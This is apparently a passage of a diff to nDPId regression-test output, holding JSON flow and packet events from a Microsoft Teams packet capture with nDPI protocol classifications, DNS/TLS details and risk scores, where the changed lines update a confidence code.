{"version":"TLSv1.2","client_requested_server_name":"52.114.250.153","server_names":"tr.teams.microsoft.com,*.tr.teams.microsoft.com,turn.teams.microsoft.com,*.turn.teams.microsoft.com,*.relay.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 5","subjectDN":"CN=tr.teams.microsoft.com","fingerprint":"A7:90:8D:41:ED:24:D2:83:48:95:90:CE:18:D3:A6:C2:62:7A:07:75"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2632,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041694219,"flow_last_seen":1587041694219,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041694219,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2632,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1587041694219,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041694219,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9w\/AqAEGNHJNiOyXAbs8mpamAAAAALAC\/\/8lfgAAAgQFtAEDAwUBAQgKMITbvgAAAAAEAgAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2633,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041694221,"flow_last_seen":1587041694221,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041694221,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2633,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1587041694221,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1587041694221,"pkt":"EBMx8Tl2KDc3AG3ICABFAABWS5cAAP8R7KfAqAEGwKgBAe2lADUAQpDJn88BAAABAAAAAAAAG2MtZmxpZ2h0cHJveHktZXVuby0wMS10ZWFtcwhjbG91ZGFwcANuZXQAABwAAQ=="} -00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2633,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041694221,"flow_last_seen":1587041694221,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041694221,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"c-flightproxy-euno-01-teams.cloudapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2633,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041694221,"flow_last_seen":1587041694221,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041694221,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"c-flightproxy-euno-01-teams.cloudapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00616{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2634,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1587041694234,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":176,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":176,"pkt_l4_len":142,"thread_ts_msec":1587041694234,"pkt":"KDc3AG3IEBMx8Tl2CABFAACixyFAADkR9tHAqAEBwKgBBgA17aUAjgAAn8+BgAABAAAAAQAAG2MtZmxpZ2h0cHJveHktZXVuby0wMS10ZWFtcwhjbG91ZGFwcANuZXQAABwAAcAoAAYAAQAAAA4AQARwcmQxDmF6dXJlZG5zLWNsb3VkwDEGbXNuaHN0CW1pY3Jvc29mdANjb20AfaP8PAAAA4QAAAEsAAk6gAAAADw="} -00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2634,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041694221,"flow_last_seen":1587041694234,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1587041694234,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"c-flightproxy-euno-01-teams.cloudapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2634,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041694221,"flow_last_seen":1587041694234,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1587041694234,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"c-flightproxy-euno-01-teams.cloudapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2637,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1587041694262,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041694262,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0VplAAGwGdII0ck2IwKgBBgG77Jdw4z8APJqWp4AS\/\/+58wAAAgQFoAEDAwgBAQQC"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2638,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1587041694262,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041694262,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAG9yfAqAEGNHJNiOyXAbs8mpancOM\/AVAQIADasgAA"} -00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2639,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041694219,"flow_last_seen":1587041694263,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1587041694263,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.flightproxy.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2639,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041694219,"flow_last_seen":1587041694263,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1587041694263,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.flightproxy.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2641,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041694219,"flow_last_seen":1587041694308,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1647,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1587041694308,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.flightproxy.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2658,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041694611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2658,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041694571,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2665,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695278,"flow_last_seen":1587041695278,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50016,"dst_port":50005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2665,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1587041695278,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695278,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMhisAAEARcdvAqAEGwKgABMNgw1UAeNtRAAEAXCESpELGQpqANK6irJWNCoEABgAJbzUvSTpGWTMyAAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUNaR7w6XgHLmtRZxpBWKVkGuwhq2AKAAE+3W4lQ=="} -00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2665,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695278,"flow_last_seen":1587041695278,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50016,"dst_port":50005,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2665,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695278,"flow_last_seen":1587041695278,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50016,"dst_port":50005,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2666,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695278,"flow_last_seen":1587041695278,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50036,"dst_port":50020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2666,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1587041695278,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695278,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMZ7QAAEARkFLAqAEGwKgABMN0w2QAeBWjAAEAXCESpEJMnOcpR8XuRjfgdwcABgAJSkZ3ajorbUl2AAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUZBvpMZrPL2uguq2xDA1A6CBjF+2AKAAEncV\/3g=="} -00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2666,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695278,"flow_last_seen":1587041695278,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50036,"dst_port":50020,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2666,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695278,"flow_last_seen":1587041695278,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50036,"dst_port":50020,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2667,"source":"teams.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695305,"flow_last_seen":1587041695305,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695305,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16332,"dst_port":50016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2667,"source":"teams.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1587041695305,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695305,"pkt":"KDc3AG3IEBMx8Tl2CABFAACMbOkAADURirVdR27NwKgBBj\/Mw2AAeJv\/AAEAXCESpEJpQfrkOEmJN4IqUAgABgAJRlkzMjpvNS9JAAAAgCkACAAAf+1eBY4AgHAABAAAAAeANgAEAAAAAQAkAARu\/\/3+gDcABAAAAAIACAAUCA60OBRrDjRc1P+cP0BpsLC+QjmAKAAEPxxxZQ=="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2667,"source":"teams.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695305,"flow_last_seen":1587041695305,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695305,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16332,"dst_port":50016,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2667,"source":"teams.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695305,"flow_last_seen":1587041695305,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695305,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16332,"dst_port":50016,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2668,"source":"teams.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695305,"flow_last_seen":1587041695305,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695305,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16333,"dst_port":50036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2668,"source":"teams.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1587041695305,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695305,"pkt":"KDc3AG3IEBMx8Tl2CABFAACM2aMAADURHftdR27NwKgBBj\/Nw3QAeFT\/AAEAXCESpEKjF0z2+O91Jw0PY1cABgAJK21JdjpKRndqAAAAgCkACAAAf+1eBY4AgHAABAAAAAeANgAEAAAAAQAkAARu\/\/3+gDcABAAAAAIACAAUo4jart22gVLrHF0JHGaI64vA9HeAKAAEUHwvEg=="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2668,"source":"teams.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695305,"flow_last_seen":1587041695305,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695305,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16333,"dst_port":50036,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2668,"source":"teams.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695305,"flow_last_seen":1587041695305,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695305,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16333,"dst_port":50036,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00556{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2670,"source":"teams.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1587041695330,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1587041695330,"pkt":"EBMx8Tl2KDc3AG3ICABFAAB0TLUAAEARoAHAqAEGXUduzcNgP8wAYAttAQEARCESpEJpQfrkOEmJN4IqUAiAcAAEAAAABwAgAAgAAR7efFXKj4A3AAQAAAACgDYABAAAAAEACAAUlU+ROI4McMZBUuZSU8\/gWyGrdx6AKAAE+OcqVw=="} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2671,"source":"teams.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":3,"flow_last_seen":1587041695330,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695330,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMkXkAAEARWyXAqAEGXUduzcNgP8wAeAk2AAEAXCESpEL9LF5WbGc54yQwO\/cABgAJbzUvSTpGWTMyAAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAU1YbVJoGA61aUBne1Qcfqud7BOGOAKAAEmnK+Jw=="} 00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2672,"source":"teams.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1587041695330,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1587041695330,"pkt":"EBMx8Tl2KDc3AG3ICABFAAB0gkYAAEARanDAqAEGXUduzcN0P80AYEblAQEARCESpEKjF0z2+O91Jw0PY1eAcAAEAAAABwAgAAgAAR7ffFXKj4A3AAQAAAACgDYABAAAAAEACAAUNbjIzLk8Htcx5rlGPdUzB6Mtkf+AKAAECmy4uA=="} @@ -480,13 +489,12 @@ 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":2681,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041695407,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2682,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695421,"flow_last_seen":1587041695421,"flow_idle_time":200000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1587041695421,"l3_proto":"ip4","src_ip":"52.114.252.21","dst_ip":"192.168.1.6","src_port":3480,"dst_port":50036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2682,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1587041695421,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1587041695421,"pkt":"KDc3AG3IEBMx8Tl2CABFAACYUPwAAGwRCyM0cvwVwKgBBg2Yw3QAhCaSAAEAaCESpEK59F1PLtIJs2rQCYoABgAJK21JdjpKRndqAAAAgCkACAAAf+1eBY4AgHAABAAAAAeANgAEAAAAAQAkAARu\/\/n+gJUACGUfNM4ueRX8gDcABAAAAAIACAAUDNg3puCxSSnyiCvs+zLb4wfWy9WAKAAEDuovdw=="} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2682,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695421,"flow_last_seen":1587041695421,"flow_idle_time":200000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1587041695421,"l3_proto":"ip4","src_ip":"52.114.252.21","dst_ip":"192.168.1.6","src_port":3480,"dst_port":50036,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 